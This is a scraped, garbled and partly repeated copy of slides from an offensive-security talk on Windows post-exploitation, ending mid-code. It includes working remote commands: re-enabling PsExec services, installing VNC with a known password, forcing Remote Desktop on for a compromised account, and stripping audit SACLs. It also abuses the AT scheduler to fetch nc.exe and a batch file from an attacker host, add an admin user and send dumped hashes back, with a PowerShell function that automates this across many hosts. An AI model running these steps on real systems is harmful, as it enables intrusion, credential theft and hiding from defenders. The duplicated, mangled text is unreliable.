Slide 67

• Related talks you should see
  – Beyond EIP – The theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)

Slide 68

• Acknowledgements
  – Thanks to
    • All the people from the offensivecomputing, nologin and uninformed IRC and SILC channels
    • HD Moore especially, for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work

Slide 69

• Questions?
• Presentation available at www.offensivecomputing.net

Page 33: Meta-Post Exploitation

Slide 33

Stealth Evading Detection

• Goals
  – Keep the system operable
    • If it breaks you can't use it
    • Someone will come fix it
  – Operate without fear of detection
  – Robustness
    • Hiding shouldn't require constant attention
  – DON'T LOOK MALICIOUS

Slide 34

Stealth Evading Detection

• Manual / Existing Tools
  – Rootkits, rootkits, rootkits
  – Meterpreter
  – Encryption
    • Shellcode encoders for IDS evasion
  – Log cleaners
  – Packers
  – Covert channels / steganography
  – Anti-analysis / anti-forensics

• See all of OC's other talks
• Also Vinnie Liu's Metasploit research

Slide 35

Stealth Evading Detection

• Different Perspective
  – DON'T BE AN ANOMALY
  – Hide in plain sight
    • Many tools have ONLY malicious uses
    • Make your intent hard to determine
  – Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

• Different Perspective
  – Know the target's environment better than they do
    • If they don't use encryption, maybe you shouldn't either
    • Change strategies to match the environment's normal behavior
  – Don't always default to exploits
    • See the Tactical Exploitation talk
    • IDSs can't see normal behavior that is malicious

Slide 37

Stealth Evading Detection

• Using Windows security objects for stealth
  – Auditing of securable objects is controlled by SACLs
  – Null SACL = no auditing = no logs
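The defender's side of that point, as an added example that is not part of the talk: a security descriptor rendered as an SDDL string (what ConvertSecurityDescriptorToStringSecurityDescriptor or PowerShell's Get-Acl with -Audit gives you) carries the SACL in its S: component, and an object whose string has no S: part at all has a NULL SACL. The function below classifies descriptors as null-SACL, present-but-empty, or actually audited, which is the check to run over sensitive objects after an incident. The three descriptor strings are constructed for the example.

```python
"""Classify the auditing state of Windows security descriptors given as SDDL
(added example; the descriptors below are constructed, not taken from a host)."""
import re

# Constructed descriptors: real audit ACE, NULL SACL, and present-but-empty SACL.
SD_AUDITED = "O:BAG:SYD:(A;;FA;;;BA)(A;;FR;;;WD)S:(AU;SAFA;FA;;;WD)"
SD_NULL_SACL = "O:BAG:SYD:(A;;FA;;;BA)(A;;FR;;;WD)"
SD_EMPTY_SACL = "O:BAG:SYD:(A;;FA;;;BA)S:"

_COMPONENT_RE = re.compile(r"(O|G|D|S):")          # owner, group, DACL, SACL markers
_ACE_RE = re.compile(r"\(([^)]*)\)")                # one parenthesised ACE
_ACE_FIELDS = ("type", "flags", "rights", "object_guid", "inherit_guid", "sid")


def split_sddl(sddl):
    """Map component letter (O, G, D, S) to its raw text; an absent letter is absent from the dict."""
    parts = {}
    marks = list(_COMPONENT_RE.finditer(sddl))
    for i, m in enumerate(marks):
        end = marks[i + 1].start() if i + 1 < len(marks) else len(sddl)
        parts[m.group(1)] = sddl[m.end():end]
    return parts


def parse_aces(component):
    """'(type;flags;rights;object;inherit;sid)' strings -> list of dicts (first six fields)."""
    aces = []
    for m in _ACE_RE.finditer(component):
        fields = m.group(1).split(";")
        if len(fields) >= 6:  # conditional ACEs carry a seventh field; ignore it
            aces.append(dict(zip(_ACE_FIELDS, fields[:6])))
    return aces


def audit_status(sddl):
    """'null-sacl' (no S: at all), 'empty-sacl' (S: without audit ACEs) or 'audited'.

    An audit ACE only generates events if it is flagged for success (SA) and/or
    failure (FA), so an AU ACE without either is treated as no auditing.
    """
    parts = split_sddl(sddl)
    if "S" not in parts:
        return "null-sacl"
    audit_aces = [
        a for a in parse_aces(parts["S"])
        if a["type"] in ("AU", "OU") and ("SA" in a["flags"] or "FA" in a["flags"])
    ]
    return "audited" if audit_aces else "empty-sacl"


def unaudited(descriptors):
    """Names of objects (name -> SDDL) whose SACL can never produce an audit event."""
    return sorted(name for name, sd in descriptors.items() if audit_status(sd) != "audited")


if __name__ == "__main__":
    sample = {"secrets.txt": SD_AUDITED, "tool.exe": SD_NULL_SACL, "svc.dll": SD_EMPTY_SACL}
    for name, sd in sample.items():
        print(f"{name}: {audit_status(sd)}")
    print("unaudited:", unaudited(sample))
```

A populated SACL is still silent if the object-access audit category is turned off in the system's audit policy, so pair this with a look at the policy itself (auditpol on Vista and later), and remember that reading SACLs requires the SeSecurityPrivilege.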

Slide 38

• DEMOS
  – Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

• It's not always about ROOT
• Look like someone else
  – Use the credentials / access of another user
• Goals
  – Change your identity at will
    • User ID, domain credentials, sessions
    • Impersonate system accounts
    • Make activities look like normal user behavior

Slide 41

User Identity Theft

• Stages and techniques
  – Target users
    • Who has access to what?
    • Where is the data?
  – Change identity
    • Hijack credentials / sessions
    • Abuse tokens
  – Access is the end goal, be it data or another system

Slide 42

User Identity Theft

• Existing tools
  – Incognito (Metasploit)
    • Enumerate / hijack tokens
  – FU / FUTo
    • Enable SYSTEM privileges
    • Change process privileges (DKOM)
  – SU / SUDO / KSU
  – Process injection
  – Hijack domain credentials

Slide 43

User Identity Theft

Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs... Oh My!

• What we want
  – Privileges or SIDs

• What we get
  – Access, Access, Access

• How we get it
  – Incognito vs. FUTo

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

• Changing existing features or settings to benefit our activities

• Goals
  – Support all post-exploitation activities
  – Disabling detection technologies
  – Enabling insecure or easy-to-use access software

Slide 47

Feature Modification

• Feature modification is basically securable object manipulation
  – Remember all those tokens and security descriptors?
  – These can be modified programmatically and directly
    • Not just through existing tools
  – Stealth / persistence requirements
    • May make it more advantageous to use custom tools
  – Access objects programmatically
  – Can be much more complex to implement

Slide 48

Feature Modification

• Re-enabling disabled access
  – PsExec: it's still cool (Thanks Mark)

• Enabling GUI access
  – VNC (from a command line)
  – Remote Desktop (even if disabled)

• Turning off or adding exceptions to security software
  – Firewalls, AV, logging

• Modifying local security policies

Slide 49

Feature Modification

• Enabling psexec
  – PsExec was a great, awesome remote shell / command tool
  – Everybody now disables ClipBook, which psexec requires. l4m3!
  – Let's re-enable it

Slide 50

Feature Modification

• Enabling psexec
• Use the service control tool, sc.exe, against the remote service control manager
  – net use \\target\ipc$ password /user:username
  – sc \\target config netdde start= auto
  – sc \\target config netddedsdm start= auto
  – sc \\target config clipsrv start= auto
  – sc \\target start netdde
  – sc \\target start netddedsdm
  – sc \\target start clipsrv

Slide 51

Feature Modification
• Enabling VNC (from command line)
  – Go get VNC (check out guhnu)
  – Make a folder on the target for the VNC files
  – Copy the following files to the target folder:
    • winvnc.exe
    • vnc.reg
    • vnchooks.dll
    • omnithread_rt.dll
  – regedit -s vnc.reg
  – winvnc -install
  – net start "vnc server"
  – winvnc
  – Password is "infected"

vnc.reg file contents:

    [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
    "SocketConnect"=dword:00000001
    "AutoPortSelect"=dword:00000001
    "InputsEnabled"=dword:00000001
    "LocalInputsDisabled"=dword:00000000
    "IdleTimeout"=dword:00000000
    "QuerySetting"=dword:00000002
    "QueryTimeout"=dword:0000000a
    "PollUnderCursor"=dword:00000000
    "PollForeground"=dword:00000001
    "PollFullScreen"=dword:00000000
    "OnlyPollConsole"=dword:00000001
    "OnlyPollOnEvent"=dword:00000000
    "Password"=hex:10,4d,89,3d,5a,e1,55,f8

The "Password" value is not a hash: WinVNC stores the password DES-encrypted under a fixed, publicly known key, so anyone who can read this registry key (or the vnc.reg file left on the target) gets "infected" back in cleartext. Treat it as a credential you have written to disk and remove it when you are done.

Slide 52

Feature Modification

• Enabling Remote Desktop remotely
  – Having a GUI to your target can be necessary
  – Maybe they are running a specialized GUI app
    • Ex: a system controlling access to security doors
      – No command-line way of modifying the system; you need the GUI
    • SCADA systems
    • Security cameras
    • Who knows what you might be up to
  – Remote Desktop is fast and already a feature of the OS
  – However, it's often disabled, maybe even by GPO


Page 34: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 35: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

• Often AT is still enabled while many other things you typically use are not

• AT is as good as having a shell
– Enable / start services
– Transfer files
– Add users
– Mess with the registry / policies
– Pretty much anything you can do with a shell
– Added bonus: defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

• Building a tool around AT – Flow

• Establish an authenticated session
• Determine the time on the target
• Pass commands to the target to be run 1 min from now

– Write a batch file that executes everything at once
– Have the target send you back whatever info you want
– Be mindful of file transfer protocols: TFTP is good, but not always "quiet" or available

Slide 61

Abusing The Scheduler

• Common use example
– net use \\target
– net time \\target
– at \\target (net time + 1 min) "tftp -i us GET e.bat"
– at \\target (net time + 2 min) e.bat
– e.bat does:

• Adds a user (net user hacked hacked /add)
– Admin group (net localgroup administrators hacked /add)

• Gets hashdumping tools and dumps hashes
• Sends hashes, identified by IP, back to the attacker host
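The flow of slides 60 and 61 as a function that walks a list of hosts the way the AtAbuse and MassNetUse tools of the Massive Automation slides do. This is an added example, not code from the talk. Assumptions: the credential is a local administrator on every target, e.bat and the TFTP server at the attacker address are yours (e.bat itself is not on the page and is not reproduced here), net time prints its English "Current time at \\HOST is ..." line, and the targets are old enough to still have at.exe (XP/2003 era; it is gone from Windows 8 / Server 2012 onward, where schtasks.exe is the replacement). The function and parameter names are this example's own.

```powershell
# Added example, not from the talk.
function Invoke-AtJob {
    param(
        [Parameter(Mandatory = $true)][string[]]$Targets,
        [Parameter(Mandatory = $true)][pscredential]$Credential,
        [Parameter(Mandatory = $true)][string]$AttackerIp,   # TFTP server / listener host
        [int]$DelayMinutes = 1
    )
    $user = $Credential.UserName
    $pass = $Credential.GetNetworkCredential().Password

    foreach ($t in $Targets) {
        $share = "\\$t\IPC`$"

        # 1. Authenticated session (net use \\target\ipc$ password /user:username)
        $null = net use $share $pass /user:$user 2>&1
        if ($LASTEXITCODE -ne 0) { Write-Warning "$t : net use failed"; continue }

        # 2. Use the target's clock, not ours: AT fires on the remote clock.
        #    net time prints e.g. "Current time at \\HOST is 3/12/2008 10:41:07 AM"
        $line = (net time "\\$t" 2>&1 | Select-String 'Current time at').Line
        if (-not $line) {
            Write-Warning "$t : net time failed"
            $null = net use $share /delete 2>&1
            continue
        }
        $remoteNow = [datetime]::Parse(($line -split ' is ', 2)[1].Trim())

        # 3. AT takes HH:mm. Drop the seconds and add DelayMinutes+1 so the first job is
        #    at least a full minute out; a time that has already passed waits a whole day.
        $base    = $remoteNow.AddSeconds(-$remoteNow.Second).AddMinutes($DelayMinutes + 1)
        $fetchAt = $base.ToString('HH:mm')
        $runAt   = $base.AddMinutes(1).ToString('HH:mm')

        # 4. First job pulls the batch file, second job runs it (as SYSTEM on XP/2003).
        at "\\$t" $fetchAt "tftp -i $AttackerIp GET e.bat"
        at "\\$t" $runAt   "e.bat"
        "$t : remote clock $remoteNow, fetch at $fetchAt, run at $runAt"

        # 5. Do not leave the credential mapped on every host you touched.
        $null = net use $share /delete 2>&1
    }
}

# Usage (hosts and address are placeholders):
# Invoke-AtJob -Targets '192.168.1.10','192.168.1.11' -Credential (Get-Credential) -AttackerIp '192.168.1.50'
```

The two-slot spacing matters: if the fetch and the run land in the same minute there is no ordering guarantee between the jobs, and e.bat can run before TFTP has finished writing it. The net time parse is locale dependent; on a non-English target the "Current time at" string and the date format both change.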

Slide 62

Abusing The Scheduler

• Privileges of LocalSystem that we care about
– NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
– SE_IMPERSONATE_NAME
– SE_TCB_NAME
– SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

• Automating techniques and tools for use against massive numbers of hosts

• Goals
– Penetrate as many systems as possible with little interaction and in a short time
– Ease of use / re-use
– Lower cost of attack

Slide 65

Massive Automation

• MassNetUse – Establish NetBIOS session credentials on a range of hosts

• MassWinenum – Enumerate NetBIOS information; bypass certain RestrictAnonymous settings

• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts

Slide 66

• DEMOS

Slide 67

• Related talks you should see
– Beyond EIP – The theoretical tool development end of things (spoonm & skape)
– Security Implications of Windows Access Tokens (Luke Jennings)

Slide 68

• Acknowledgements
– Thanks to:

• All the people from offensivecomputing, nologin, uninformed, IRC and SILC channels
• HD Moore especially, for support and mentorship
• Danny Quist, krbklepto, Egypt, spoonm, skape
• Luke Jennings for his awesome work

Slide 69

• Questions?
• Presentation available at www.offensivecomputing.net


Slide 36

Stealth / Evading Detection

• Different Perspective
– Know the target's environment better than they do

• If they don't use encryption, maybe you shouldn't either
• Change strategies to match the environment's normal behavior

– Don't always default to exploits
• See the Tactical Exploitation talk
• IDSs can't see normal behavior that is malicious

Slide 37

Stealth / Evading Detection

• Using Windows security objects for stealth
– Auditing of Securable Objects is controlled by SACLs
– Null SACL = No Auditing = No Logs
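The slide's point in working form, as an added example that is not part of the original deck: the defender's audit entry on a folder, the attacker's stripping of that SACL, and the sweep a defender runs afterwards to find objects that should be audited but have an empty SACL. Reading or writing a SACL needs SeSecurityPrivilege, so run this elevated; the folder path and the Everyone principal are assumptions for illustration. An emptied SACL is not literally a null one, but the effect the slide describes is the same: no object-access events for that object, whatever the system audit policy says.

```powershell
# Added example, not from the talk. Path and principal are assumptions.
$Path = 'C:\ProgramData\sensitive'
if (-not (Test-Path $Path)) { New-Item -ItemType Directory -Path $Path | Out-Null }

function Get-AuditEntries {
    param([string]$Target)
    # -Audit makes Get-Acl read the SACL as well as the DACL (needs SeSecurityPrivilege)
    $acl = Get-Acl -Path $Target -Audit
    @($acl.GetAuditRules($true, $true, [System.Security.Principal.NTAccount]))
}

# 1. Defender: audit successful and failed write/delete access by Everyone,
#    inherited by everything below the folder.
$rights  = [System.Security.AccessControl.FileSystemRights]'Write, Delete'
$inherit = [System.Security.AccessControl.InheritanceFlags]'ContainerInherit, ObjectInherit'
$prop    = [System.Security.AccessControl.PropagationFlags]::None
$flags   = [System.Security.AccessControl.AuditFlags]'Success, Failure'
$rule    = New-Object System.Security.AccessControl.FileSystemAuditRule('Everyone', $rights, $inherit, $prop, $flags)
$acl = Get-Acl -Path $Path -Audit
$acl.AddAuditRule($rule)
Set-Acl -Path $Path -AclObject $acl
'Audit entries before: {0}' -f (@(Get-AuditEntries $Path).Count)

# 2. Attacker (the slide's trick): stop inheriting audit entries without copying them,
#    remove the explicit ones, and write the now-empty SACL back. Access to $Path and
#    its children no longer produces object-access events (560 on XP/2003, 4663 on
#    Vista and later), regardless of the "Audit object access" policy setting.
$acl = Get-Acl -Path $Path -Audit
$acl.SetAuditRuleProtection($true, $false)
foreach ($r in @($acl.GetAuditRules($true, $false, [System.Security.Principal.NTAccount]))) {
    [void]$acl.RemoveAuditRule($r)
}
Set-Acl -Path $Path -AclObject $acl
'Audit entries after: {0}' -f (@(Get-AuditEntries $Path).Count)

# 3. Detection: sweep the paths policy says must be audited and report empty SACLs.
#    Pair this with event 4907 ("Auditing settings on object were changed"), which fires
#    when "Audit policy change" is enabled and records who emptied the SACL.
function Find-UnauditedPaths {
    param([string[]]$MustAudit)
    foreach ($p in $MustAudit) {
        if (@(Get-AuditEntries $p).Count -eq 0) { $p }
    }
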